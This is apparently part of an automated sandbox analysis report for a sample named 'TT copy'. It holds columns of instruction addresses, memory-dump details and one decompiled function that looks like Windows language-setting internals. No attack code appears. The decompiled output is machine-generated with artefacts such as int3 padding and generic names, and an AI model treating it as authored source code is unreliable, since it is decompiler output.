                                                                                                            0x010928c8
                                                                                                            0x010928d2
                                                                                                            0x010928d4
                                                                                                            0x010928d8
                                                                                                            0x010928db
                                                                                                            0x010d5c26
                                                                                                            0x010d5c28
                                                                                                            0x010d5c2d
                                                                                                            0x010d5c2d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5c34
                                                                                                            0x010d5c36
                                                                                                            0x010d5c49
                                                                                                            0x010d5c4e
                                                                                                            0x010d5c54
                                                                                                            0x010d5c5b
                                                                                                            0x010d5c5d
                                                                                                            0x010d5c60
                                                                                                            0x01092788
                                                                                                            0x01092788
                                                                                                            0x0109278b
                                                                                                            0x0109278e
                                                                                                            0x0109278e
                                                                                                            0x0109278e
                                                                                                            0x01092791
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092756
                                                                                                            0x01092750
                                                                                                            0x00000000
                                                                                                            0x01092794
                                                                                                            0x01092794
                                                                                                            0x01092795
                                                                                                            0x01092798
                                                                                                            0x01092798
                                                                                                            0x00000000
                                                                                                            0x01092734
                                                                                                            0x0109272c
                                                                                                            0x01092700
                                                                                                            0x010925ef
                                                                                                            0x010925ef
                                                                                                            0x010925ef
                                                                                                            0x010925f2
                                                                                                            0x010925f8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010925fe
                                                                                                            0x00000000
                                                                                                            0x010928e6
                                                                                                            0x010928ec
                                                                                                            0x010928ef
                                                                                                            0x010928f5
                                                                                                            0x010928f8
                                                                                                            0x010928f8
                                                                                                            0x00000000
                                                                                                            0x010928f8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092866
                                                                                                            0x01092866
                                                                                                            0x01092876
                                                                                                            0x01092879
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010927e0
                                                                                                            0x010927e7
                                                                                                            0x010927e9
                                                                                                            0x010927eb
                                                                                                            0x010d5afd
                                                                                                            0x00000000
                                                                                                            0x010d5afd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092633
                                                                                                            0x01092638
                                                                                                            0x0109263b
                                                                                                            0x0109263c
                                                                                                            0x0109263e
                                                                                                            0x01092640
                                                                                                            0x01092642
                                                                                                            0x01092647
                                                                                                            0x01092649
                                                                                                            0x0109264e
                                                                                                            0x01092650
                                                                                                            0x01092653
                                                                                                            0x01092659
                                                                                                            0x010926a2
                                                                                                            0x010926a7
                                                                                                            0x010926ac
                                                                                                            0x010926b2
                                                                                                            0x010d5b11
                                                                                                            0x010d5b15
                                                                                                            0x010d5b17
                                                                                                            0x00000000
                                                                                                            0x010926b8
                                                                                                            0x010926b8
                                                                                                            0x010926ba
                                                                                                            0x010927a6
                                                                                                            0x010927a6
                                                                                                            0x010927a9
                                                                                                            0x010927ab
                                                                                                            0x010927b9
                                                                                                            0x010927b9
                                                                                                            0x010927be
                                                                                                            0x010927c1
                                                                                                            0x010927c3
                                                                                                            0x010927c5
                                                                                                            0x010927c7
                                                                                                            0x010d5c74
                                                                                                            0x010d5c79
                                                                                                            0x010d5c79
                                                                                                            0x010927c7
                                                                                                            0x00000000
                                                                                                            0x010926c0
                                                                                                            0x010926c0
                                                                                                            0x010926c3
                                                                                                            0x010926c6
                                                                                                            0x010926c6
                                                                                                            0x010926c9
                                                                                                            0x010926c9
                                                                                                            0x00000000
                                                                                                            0x010926c9
                                                                                                            0x010926ba
                                                                                                            0x0109265b
                                                                                                            0x0109265b
                                                                                                            0x0109265e
                                                                                                            0x01092667
                                                                                                            0x0109266d
                                                                                                            0x01092677
                                                                                                            0x0109267c
                                                                                                            0x0109267f
                                                                                                            0x01092681
                                                                                                            0x010d5b49
                                                                                                            0x010d5b4e
                                                                                                            0x010927cd
                                                                                                            0x010927d0
                                                                                                            0x010927d1
                                                                                                            0x010927d2
                                                                                                            0x010927d4
                                                                                                            0x010927dd
                                                                                                            0x01092687
                                                                                                            0x01092687
                                                                                                            0x0109268a
                                                                                                            0x0109268b
                                                                                                            0x0109268e
                                                                                                            0x0109268f
                                                                                                            0x01092691
                                                                                                            0x01092696
                                                                                                            0x01092698
                                                                                                            0x0109269d
                                                                                                            0x0109269f
                                                                                                            0x00000000
                                                                                                            0x0109269f
                                                                                                            0x01092681
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092846
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092605
                                                                                                            0x0109260a
                                                                                                            0x0109260c
                                                                                                            0x01092611
                                                                                                            0x01092616
                                                                                                            0x01092619
                                                                                                            0x01092619
                                                                                                            0x0109261e
                                                                                                            0x00000000
                                                                                                            0x01092624
                                                                                                            0x01092627
                                                                                                            0x01092627
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5b1f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092894
                                                                                                            0x0109289b
                                                                                                            0x0109289d
                                                                                                            0x010928a1
                                                                                                            0x010d5b2b
                                                                                                            0x010d5b2e
                                                                                                            0x010d5b2e
                                                                                                            0x010928a7
                                                                                                            0x010928a9
                                                                                                            0x010d5b04
                                                                                                            0x010d5b09
                                                                                                            0x010d5b09
                                                                                                            0x010d5b09
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5b35
                                                                                                            0x010d5b3c
                                                                                                            0x010928fb
                                                                                                            0x010928fb
                                                                                                            0x010926cc
                                                                                                            0x010926cc
                                                                                                            0x010926d0
                                                                                                            0x00000000
                                                                                                            0x010926d2
                                                                                                            0x010926d2
                                                                                                            0x00000000
                                                                                                            0x010926d2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010925fe
                                                                                                            0x0109292d
                                                                                                            0x0109292f
                                                                                                            0x01092930
                                                                                                            0x01092935
                                                                                                            0x01092937
                                                                                                            0x01092939
                                                                                                            0x0109293c
                                                                                                            0x0109293e
                                                                                                            0x0109293f
                                                                                                            0x01092941
                                                                                                            0x01092945
                                                                                                            0x01092946
                                                                                                            0x01092948
                                                                                                            0x0109294e
                                                                                                            0x0109294f
                                                                                                            0x01092954
                                                                                                            0x0109295a
                                                                                                            0x0109295c
                                                                                                            0x01092962
                                                                                                            0x01092963
                                                                                                            0x01092965
                                                                                                            0x01092966
                                                                                                            0x01092968
                                                                                                            0x0109296b
                                                                                                            0x0109296e
                                                                                                            0x0109296f
                                                                                                            0x01092971
                                                                                                            0x01092974
                                                                                                            0x01092980
                                                                                                            0x01092981
                                                                                                            0x01092982
                                                                                                            0x01092983
                                                                                                            0x01092984
                                                                                                            0x01092985
                                                                                                            0x01092986
                                                                                                            0x01092987
                                                                                                            0x01092988
                                                                                                            0x01092989
                                                                                                            0x0109298a
                                                                                                            0x0109298b
                                                                                                            0x0109298c
                                                                                                            0x0109298d
                                                                                                            0x0109298e
                                                                                                            0x0109298f
                                                                                                            0x01092990
                                                                                                            0x01092992
                                                                                                            0x01092997
                                                                                                            0x010929a3
                                                                                                            0x010929a6
                                                                                                            0x010929ab
                                                                                                            0x010929ad
                                                                                                            0x010929b0
                                                                                                            0x010929b2
                                                                                                            0x010d5c80
                                                                                                            0x010929b8
                                                                                                            0x010929b8
                                                                                                            0x010929bb
                                                                                                            0x010929c0
                                                                                                            0x010929c5
                                                                                                            0x010929c6
                                                                                                            0x010929c6
                                                                                                            0x010929c9
                                                                                                            0x010929cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010929cd
                                                                                                            0x010929d0
                                                                                                            0x010929d9
                                                                                                            0x010929db
                                                                                                            0x010929dd
                                                                                                            0x01092a7f
                                                                                                            0x01092a84
                                                                                                            0x01092a87
                                                                                                            0x01092a89
                                                                                                            0x010d5ca1
                                                                                                            0x010d5ca3
                                                                                                            0x00000000
                                                                                                            0x01092a8f
                                                                                                            0x01092a8f
                                                                                                            0x00000000
                                                                                                            0x01092a8f
                                                                                                            0x00000000
                                                                                                            0x010929e3
                                                                                                            0x010929e3
                                                                                                            0x010929e3
                                                                                                            0x00000000
                                                                                                            0x010929e3
                                                                                                            0x010929dd
                                                                                                            0x00000000
                                                                                                            0x010929db
                                                                                                            0x010929e6
                                                                                                            0x010929e9
                                                                                                            0x010929eb
                                                                                                            0x010929ed
                                                                                                            0x010929f3
                                                                                                            0x010929f5
                                                                                                            0x010929f8
                                                                                                            0x010929fa
                                                                                                            0x01092a97
                                                                                                            0x01092a9a
                                                                                                            0x01092a9d
                                                                                                            0x01092add
                                                                                                            0x00000000
                                                                                                            0x01092a9f
                                                                                                            0x01092aa2
                                                                                                            0x01092aa5
                                                                                                            0x01092aa8
                                                                                                            0x01092aab
                                                                                                            0x010d5cab
                                                                                                            0x010d5caf
                                                                                                            0x010d5cc5
                                                                                                            0x010d5cda
                                                                                                            0x010d5cdc
                                                                                                            0x010d5cdf
                                                                                                            0x010d5ce5
                                                                                                            0x00000000
                                                                                                            0x010d5ceb
                                                                                                            0x010d5ced
                                                                                                            0x010d5cee
                                                                                                            0x00000000
                                                                                                            0x010d5cee
                                                                                                            0x010d5cb1
                                                                                                            0x010d5cb4
                                                                                                            0x010d5cb9
                                                                                                            0x010d5cbb
                                                                                                            0x00000000
                                                                                                            0x010d5cbd
                                                                                                            0x010d5cbd
                                                                                                            0x00000000
                                                                                                            0x010d5cbd
                                                                                                            0x010d5cbb
                                                                                                            0x01092ab1
                                                                                                            0x01092ab1
                                                                                                            0x01092ac4
                                                                                                            0x01092ac6
                                                                                                            0x01092ac6
                                                                                                            0x00000000
                                                                                                            0x01092ac6
                                                                                                            0x01092aab
                                                                                                            0x00000000
                                                                                                            0x01092a00
                                                                                                            0x01092a09
                                                                                                            0x01092a0e
                                                                                                            0x01092a21
                                                                                                            0x01092a24
                                                                                                            0x01092a35
                                                                                                            0x01092a3a
                                                                                                            0x01092a3d
                                                                                                            0x01092a42
                                                                                                            0x01092a59
                                                                                                            0x01092a59
                                                                                                            0x01092a5c
                                                                                                            0x01092a5f
                                                                                                            0x01092a5f
                                                                                                            0x010929fa
                                                                                                            0x010929f3
                                                                                                            0x01092a64
                                                                                                            0x01092a64
                                                                                                            0x01092a6b
                                                                                                            0x01092a6b
                                                                                                            0x01092a6d
                                                                                                            0x01092a72
                                                                                                            0x01092a72
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PATH
                                                                                                            • API String ID: 0-1036084923
                                                                                                            • Opcode ID: df81ce6f6333766a43880a936cd608cf6dd09776c5833853dc396a0b4064fa8d
                                                                                                            • Instruction ID: cb9b8f1e192965e11563226744908bfde11d42ad8c1c84cd670a171e3732a159
                                                                                                            • Opcode Fuzzy Hash: df81ce6f6333766a43880a936cd608cf6dd09776c5833853dc396a0b4064fa8d
                                                                                                            • Instruction Fuzzy Hash: FCC18CB1E00219EBDF24DF99D891BAEBBF1FF48710F444069E991BB250D734A941DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E0109FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0107EEF0(0x1157b60);
					_t134 =  *0x1157b84; // 0x77497b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1157b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1157b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01076D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E010776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01108938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0106B150();
													}
													_t116 = E01106D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E010775CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1158638; // 0x0
																	_t122 = L010738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E010776E2(_t154);
																			goto L41;
																		}
																	} else {
																		E010776E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0109FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L010770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0109FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0109FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0109FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0109FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0109FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1157b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1157b84 = _t75;
						_t73 = E0107EB70(_t134, 0x1157b60);
						if( *0x1157b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0107FF60( *0x1157b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                            0x0109fab0
                                                                                                            0x0109fab2
                                                                                                            0x0109fab3
                                                                                                            0x0109fab4
                                                                                                            0x0109fabc
                                                                                                            0x0109fac0
                                                                                                            0x0109fb14
                                                                                                            0x0109fb17
                                                                                                            0x0109fac2
                                                                                                            0x0109fac8
                                                                                                            0x0109facd
                                                                                                            0x0109fad3
                                                                                                            0x0109fad3
                                                                                                            0x0109fadd
                                                                                                            0x0109fb18
                                                                                                            0x0109fb1b
                                                                                                            0x0109fb1d
                                                                                                            0x0109fb1e
                                                                                                            0x0109fb1f
                                                                                                            0x0109fb20
                                                                                                            0x0109fb21
                                                                                                            0x0109fb22
                                                                                                            0x0109fb23
                                                                                                            0x0109fb24
                                                                                                            0x0109fb25
                                                                                                            0x0109fb26
                                                                                                            0x0109fb27
                                                                                                            0x0109fb28
                                                                                                            0x0109fb29
                                                                                                            0x0109fb2a
                                                                                                            0x0109fb2b
                                                                                                            0x0109fb2c
                                                                                                            0x0109fb2d
                                                                                                            0x0109fb2e
                                                                                                            0x0109fb2f
                                                                                                            0x0109fb3a
                                                                                                            0x0109fb3b
                                                                                                            0x0109fb3e
                                                                                                            0x0109fb41
                                                                                                            0x0109fb44
                                                                                                            0x0109fb47
                                                                                                            0x0109fb4a
                                                                                                            0x0109fb4d
                                                                                                            0x0109fb53
                                                                                                            0x010dbdcb
                                                                                                            0x010dbdcb
                                                                                                            0x0109fb59
                                                                                                            0x0109fb5b
                                                                                                            0x0109fb5b
                                                                                                            0x0109fb5e
                                                                                                            0x010dbdd5
                                                                                                            0x010dbdd8
                                                                                                            0x00000000
                                                                                                            0x010dbdda
                                                                                                            0x00000000
                                                                                                            0x010dbdda
                                                                                                            0x0109fb64
                                                                                                            0x0109fb64
                                                                                                            0x0109fb64
                                                                                                            0x0109fb67
                                                                                                            0x0109fb6e
                                                                                                            0x0109fb70
                                                                                                            0x0109fb72
                                                                                                            0x00000000
                                                                                                            0x0109fb78
                                                                                                            0x0109fb7a
                                                                                                            0x0109fb7a
                                                                                                            0x0109fb7d
                                                                                                            0x0109fb80
                                                                                                            0x010dbddf
                                                                                                            0x010dbde1
                                                                                                            0x00000000
                                                                                                            0x010dbde3
                                                                                                            0x00000000
                                                                                                            0x010dbde3
                                                                                                            0x0109fb86
                                                                                                            0x0109fb86
                                                                                                            0x0109fb86
                                                                                                            0x0109fb8b
                                                                                                            0x0109fb90
                                                                                                            0x0109fb92
                                                                                                            0x0109fb94
                                                                                                            0x0109fb9a
                                                                                                            0x0109fb9b
                                                                                                            0x0109fba1
                                                                                                            0x010dbde8
                                                                                                            0x010dbdeb
                                                                                                            0x010dbded
                                                                                                            0x010dbeb5
                                                                                                            0x010dbeb5
                                                                                                            0x010dbebb
                                                                                                            0x010dbebd
                                                                                                            0x010dbec3
                                                                                                            0x010dbed2
                                                                                                            0x010dbedd
                                                                                                            0x010dbedd
                                                                                                            0x010dbeed
                                                                                                            0x00000000
                                                                                                            0x010dbdf3
                                                                                                            0x010dbdfe
                                                                                                            0x010dbe06
                                                                                                            0x010dbe0b
                                                                                                            0x010dbe0d
                                                                                                            0x010dbe0f
                                                                                                            0x010dbe14
                                                                                                            0x010dbe19
                                                                                                            0x010dbe20
                                                                                                            0x010dbe25
                                                                                                            0x010dbe27
                                                                                                            0x010dbe35
                                                                                                            0x010dbe39
                                                                                                            0x010dbe46
                                                                                                            0x010dbe4f
                                                                                                            0x010dbe54
                                                                                                            0x010dbe56
                                                                                                            0x010dbef8
                                                                                                            0x010dbef8
                                                                                                            0x00000000
                                                                                                            0x010dbe5c
                                                                                                            0x010dbe5c
                                                                                                            0x010dbe60
                                                                                                            0x00000000
                                                                                                            0x010dbe66
                                                                                                            0x010dbe66
                                                                                                            0x010dbe7f
                                                                                                            0x010dbe84
                                                                                                            0x010dbe87
                                                                                                            0x010dbe89
                                                                                                            0x010dbe8b
                                                                                                            0x010dbe99
                                                                                                            0x010dbe9d
                                                                                                            0x010dbea0
                                                                                                            0x010dbeac
                                                                                                            0x010dbeaf
                                                                                                            0x010dbeb1
                                                                                                            0x010dbeb3
                                                                                                            0x010dbeb3
                                                                                                            0x00000000
                                                                                                            0x010dbea2
                                                                                                            0x010dbea2
                                                                                                            0x00000000
                                                                                                            0x010dbea2
                                                                                                            0x010dbe8d
                                                                                                            0x010dbe8d
                                                                                                            0x010dbe92
                                                                                                            0x00000000
                                                                                                            0x010dbe92
                                                                                                            0x010dbe8b
                                                                                                            0x010dbe60
                                                                                                            0x010dbe3b
                                                                                                            0x010dbe3b
                                                                                                            0x010dbe3e
                                                                                                            0x00000000
                                                                                                            0x010dbe40
                                                                                                            0x010dbe40
                                                                                                            0x010dbe44
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010dbe44
                                                                                                            0x010dbe3e
                                                                                                            0x010dbe29
                                                                                                            0x010dbe29
                                                                                                            0x00000000
                                                                                                            0x010dbe29
                                                                                                            0x010dbe27
                                                                                                            0x00000000
                                                                                                            0x0109fba7
                                                                                                            0x0109fba7
                                                                                                            0x0109fbab
                                                                                                            0x010dbf02
                                                                                                            0x0109fbb1
                                                                                                            0x0109fbb1
                                                                                                            0x0109fbb8
                                                                                                            0x0109fbbd
                                                                                                            0x0109fbbd
                                                                                                            0x0109fbbf
                                                                                                            0x0109fbbf
                                                                                                            0x0109fbc5
                                                                                                            0x0109fbcb
                                                                                                            0x0109fbf8
                                                                                                            0x0109fbf8
                                                                                                            0x0109fbfa
                                                                                                            0x00000000
                                                                                                            0x0109fc00
                                                                                                            0x0109fc00
                                                                                                            0x0109fc03
                                                                                                            0x00000000
                                                                                                            0x0109fc09
                                                                                                            0x0109fc09
                                                                                                            0x0109fc0f
                                                                                                            0x0109fc15
                                                                                                            0x0109fc23
                                                                                                            0x0109fc23
                                                                                                            0x0109fc25
                                                                                                            0x0109fc27
                                                                                                            0x0109fc75
                                                                                                            0x0109fc7c
                                                                                                            0x0109fc84
                                                                                                            0x00000000
                                                                                                            0x0109fc29
                                                                                                            0x0109fc29
                                                                                                            0x0109fc2d
                                                                                                            0x0109fc30
                                                                                                            0x010dbf0f
                                                                                                            0x00000000
                                                                                                            0x0109fc36
                                                                                                            0x0109fc38
                                                                                                            0x0109fc3b
                                                                                                            0x0109fc41
                                                                                                            0x010dbf17
                                                                                                            0x010dbf19
                                                                                                            0x010dbf48
                                                                                                            0x010dbf4b
                                                                                                            0x00000000
                                                                                                            0x010dbf1b
                                                                                                            0x010dbf22
                                                                                                            0x010dbf24
                                                                                                            0x010dbf26
                                                                                                            0x00000000
                                                                                                            0x010dbf2c
                                                                                                            0x010dbf37
                                                                                                            0x010dbf39
                                                                                                            0x010dbf3b
                                                                                                            0x00000000
                                                                                                            0x010dbf41
                                                                                                            0x010dbf41
                                                                                                            0x010dbf41
                                                                                                            0x010dbf41
                                                                                                            0x010dbf45
                                                                                                            0x00000000
                                                                                                            0x010dbf45
                                                                                                            0x010dbf3b
                                                                                                            0x010dbf26
                                                                                                            0x00000000
                                                                                                            0x0109fc47
                                                                                                            0x0109fc47
                                                                                                            0x0109fc49
                                                                                                            0x0109fcb2
                                                                                                            0x0109fcb4
                                                                                                            0x0109fcb6
                                                                                                            0x0109fcdc
                                                                                                            0x0109fcdc
                                                                                                            0x00000000
                                                                                                            0x0109fcb8
                                                                                                            0x0109fcc3
                                                                                                            0x0109fcc5
                                                                                                            0x0109fcc7
                                                                                                            0x00000000
                                                                                                            0x0109fcc9
                                                                                                            0x0109fcc9
                                                                                                            0x0109fccd
                                                                                                            0x00000000
                                                                                                            0x0109fccd
                                                                                                            0x0109fcc7
                                                                                                            0x00000000
                                                                                                            0x0109fc4b
                                                                                                            0x0109fc4b
                                                                                                            0x0109fc4e
                                                                                                            0x0109fc4e
                                                                                                            0x0109fc51
                                                                                                            0x0109fc51
                                                                                                            0x0109fc54
                                                                                                            0x0109fc5a
                                                                                                            0x0109fc5c
                                                                                                            0x0109fc5f
                                                                                                            0x0109fc61
                                                                                                            0x0109fc63
                                                                                                            0x0109fc65
                                                                                                            0x0109fc67
                                                                                                            0x0109fc6e
                                                                                                            0x0109fc72
                                                                                                            0x0109fc72
                                                                                                            0x0109fc72
                                                                                                            0x0109fc72
                                                                                                            0x0109fc67
                                                                                                            0x0109fc61
                                                                                                            0x00000000
                                                                                                            0x0109fc5a
                                                                                                            0x0109fc49
                                                                                                            0x0109fc41
                                                                                                            0x0109fc30
                                                                                                            0x0109fc27
                                                                                                            0x0109fc03
                                                                                                            0x0109fbcd
                                                                                                            0x0109fbd3
                                                                                                            0x0109fbd9
                                                                                                            0x0109fbdc
                                                                                                            0x0109fbde
                                                                                                            0x0109fc99
                                                                                                            0x0109fc9b
                                                                                                            0x0109fc9d
                                                                                                            0x0109fcd5
                                                                                                            0x0109fcd5
                                                                                                            0x0109fc89
                                                                                                            0x0109fc89
                                                                                                            0x00000000
                                                                                                            0x0109fc9f
                                                                                                            0x0109fc9f
                                                                                                            0x0109fca3
                                                                                                            0x00000000
                                                                                                            0x0109fca3
                                                                                                            0x00000000
                                                                                                            0x0109fbe4
